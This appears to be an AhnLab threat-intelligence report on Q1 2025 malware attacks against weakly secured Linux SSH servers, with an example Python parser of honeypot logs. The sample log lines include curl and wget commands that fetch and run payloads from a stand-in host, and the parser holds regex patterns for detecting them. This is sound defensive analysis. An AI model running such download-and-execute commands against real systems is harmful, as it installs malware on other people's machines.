Statistical Report on Malware Targeting Linux SSH Servers in Q1 2025

Overview

AhnLab SEcurity intelligence Center (ASEC) uses honeypots to respond to and classify brute force and dictionary attacks targeting poorly managed Linux SSH servers. This report covers the attack sources identified from honeypot logs in the first quarter of 2025, along with statistics on the attacks those sources carried out. It also categorizes the malware used in each attack and summarizes the statistical details.

Statistics

1. Status of Attacks on Linux SSH Servers

The following statistics are based on AhnLab honeypot logs of attacks targeting Linux SSH servers during the first quarter of 2025. Attacks by the worm malware P2PInfect ranked first with 56.3%, followed by Tsunami with 25.4%. Together, these two families account for 80% of all malware observed.

Figure 1. Status of attacks on Linux SSH servers in Q1 2025

The “Attack source” category refers to the number of systems used in attacks by malware or threat actors, that is, systems on which the execution of malware installation commands has actually been confirmed. ASEC honeypots collect logs of attacks targeting poorly managed Linux SSH servers, defined here as environments vulnerable to brute force or dictionary attacks because of poorly configured account credentials. If a login on such an inadequately managed system succeeds, the malware or threat actor gains control over it.

The “Attack status” category shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers begin with scanning. After scanning, most attack attempts end either once account credentials have been obtained through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. This report summarizes statistics only for cases that go beyond this stage and have confirmed logs of malware being installed.
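As an added illustration of how the two categories above are derived (example code, not ASEC's tooling), the Python below groups constructed honeypot records into SSH sessions, discards sessions that stop at credential guessing or basic information collection, and reports per-family attack counts (“attack status”) and distinct attacking systems (“attack source”). The log format, the install-stage command heuristic and the family tags are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed honeypot records (not ASEC data; RFC 5737 addresses): "<time> <session> <src_ip> <event> <detail>".
SAMPLE_LOG = """\
2025-01-12T03:14:12Z s1 203.0.113.10 cmd uname -a
2025-01-12T03:14:15Z s1 203.0.113.10 cmd curl -s http://198.51.100.7/x.sh | sh
2025-01-12T03:14:16Z s1 203.0.113.10 tag P2PInfect
2025-01-13T11:02:03Z s2 203.0.113.10 cmd wget -O /tmp/.x http://198.51.100.7/x
2025-01-13T11:02:04Z s2 203.0.113.10 cmd chmod +x /tmp/.x; /tmp/.x
2025-01-13T11:02:05Z s2 203.0.113.10 tag P2PInfect
2025-01-14T22:40:10Z s3 198.51.100.23 login_ok admin
2025-01-14T22:40:11Z s3 198.51.100.23 cmd cat /proc/cpuinfo
2025-01-15T05:00:02Z s4 192.0.2.77 cmd cd /tmp; wget http://198.51.100.7/t; sh t
2025-01-15T05:00:03Z s4 192.0.2.77 tag Tsunami
"""

# Heuristic (an assumption of this example): a command that fetches or launches a payload marks
# the step beyond basic information collection that the report counts as a malware installation.
INSTALL_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*(\|\s*(sh|bash)\b|\s-[oO]\s)"),
    re.compile(r"\bchmod\s+\+x\b"),
    re.compile(r"\b(sh|bash)\s+\S+$"),
]

def parse_sessions(log):
    # Group records by SSH session: source IP, executed commands, analyst family tag.
    sessions = defaultdict(lambda: {"ip": None, "cmds": [], "family": None})
    for line in log.splitlines():
        _ts, sid, ip, event, detail = line.split(" ", 4)
        sess = sessions[sid]
        sess["ip"] = ip
        if event == "cmd":
            sess["cmds"].append(detail)
        elif event == "tag":
            sess["family"] = detail
    return sessions

def reached_install_stage(cmds):
    return any(p.search(c) for c in cmds for p in INSTALL_PATTERNS)

def summarize(log):
    # Per family: attack count ("attack status"), share of all attacks, distinct systems ("attack source").
    attacks, sources = defaultdict(int), defaultdict(set)
    for sess in parse_sessions(log).values():
        if not reached_install_stage(sess["cmds"]):
            continue  # scanning, credential guessing or info gathering only: not counted
        family = sess["family"] or "Unclassified"
        attacks[family] += 1
        sources[family].add(sess["ip"])
    total = sum(attacks.values())
    return {f: {"attacks": n, "share": round(100 * n / total, 1), "sources": len(sources[f])}
            for f, n in attacks.items()}
```

On the sample data, P2PInfect shows two attacks but a single attack source, because both sessions came from the same system; this is the distinction between the two categories.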